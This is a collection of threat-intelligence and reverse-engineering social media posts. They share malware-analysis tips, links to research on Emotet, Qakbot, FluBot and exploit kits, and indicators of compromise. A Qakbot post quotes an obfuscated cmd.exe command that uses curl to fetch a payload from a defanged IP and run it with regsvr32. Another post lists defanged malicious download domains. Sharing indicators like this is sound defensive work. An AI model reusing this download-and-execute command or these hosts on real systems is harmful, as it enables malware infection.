RE tip of the day: If you want to manually debug a chain of XLM (aka Excel 4.0) macros in a document, you can use Excel for this purpose. Select a cell with the first formula and go to View -> Macros -> View Macros -> Step Into #infosec #cybersecurity #malware #reverseengineering

On the SANS ISC blog, f_462_958 reviews activity from a recent #Emotet infection. Many researchers have confirmed the return of Emotet. isc.sans.edu/diary/28044

RE tip of the day: DIFAT is an array of 4-byte entries at the end of the MS-CFB header storing locations of FAT sectors. If it is not enough, the remaining entries are stored in dedicated DIFAT sectors pointed to in the header #infosec #cybersecurity #malware #reverseengineering

The first article in the Malware Analysis Series (MAS) is available (36 pages): (link 1): blackstormsecurity.com/docs/MAS_1.pdf (link 2): exploitreversing.files.wordpress.com/2021/12/mas_1.… Slides and other articles are available on: exploitreversing.com #malware #reverseengineering #programming #threathunting

Clustered some more C2s. This time it's a period of a year and just focused on what might be overlapping with new #emotet. As expected there is some overlap with #dridex and old emotet. There are some other interesting connections there, but I'll leave that to the reader.

Sygnia’s Incident Response team identified a threat group dubbed 'Elephant Beetle' (or TG2003) siphoning off funds from businesses in the financial sector in Latin America blog.sygnia.co/elephant-beetl…

F5 researchers analyse FluBot's new capabilities in versions 5.0 and beyond. f5.com/labs/articles/…

Avast researchers look at two browser exploit kits, MagnitudeEK & UnderminerEK, that are experimenting with exploit chains targeting unpatched users of Google Chrome & other Chromium-based browsers. decoded.avast.io/janvojtesek/ex…

Cisco Talos's Chetan Raghuprasad & Vanja Svajcer write about Nanocore, Netwire & AsyncRAT campaigns that abuse public clouds. In this way threat actors can set up their infrastructure with minimal time/monetary commitments and detection is more difficult. blog.talosintelligence.com/2022/01/nanoco…

#Qakbot - obama197 - .html > .zip > .lnk > .dll HTML Smuggling. cmd.exe /c set r1=regsv && set cu=cur && call %windir%\system32\%cu%l -s -o %temp%\oneWhich.png 85.239.55.]212/whichABy.jpg call %windir%\system32\%r1%r32 %temp%\oneWhich.png IOC's github.com/pr0xylife/Qakb…

#Qakbot

#Raccoon

#Hive Ransomware

#emotet #epoch5 #heodo #Italy Xls👇 bazaar.abuse.ch/sample/6df84a8… Dll👇👇 bazaar.abuse.ch/sample/c15657a… 🔽Dll Urls🔽 urlhaus.abuse.ch/browse/tag/emo…

#Emotet

#Qakbot

#CVE-2022-30190

#CVE-2022-2294

Started Writing about top 100 malware family. It is just beginning, I will update when add new malware. cybrient.blogspot.com Suggestion are welcome.

#booking #fakecaptcha unitycommunityliving.]com/5253 👇 admin-extranetmnxz-captcha.]com/?ref=842727 👇 bknqsercise.]com/bomla 👇 admin-extranetadm-captcha.]com/updserc.zip Samples bazaar.abuse.ch/browse/tag/bkn… AnyRun app.any.run/tasks/1688a379… cc Mikhail Kasimov Kelsey ܛܔܔܔܛܔܛܔܛ 1/2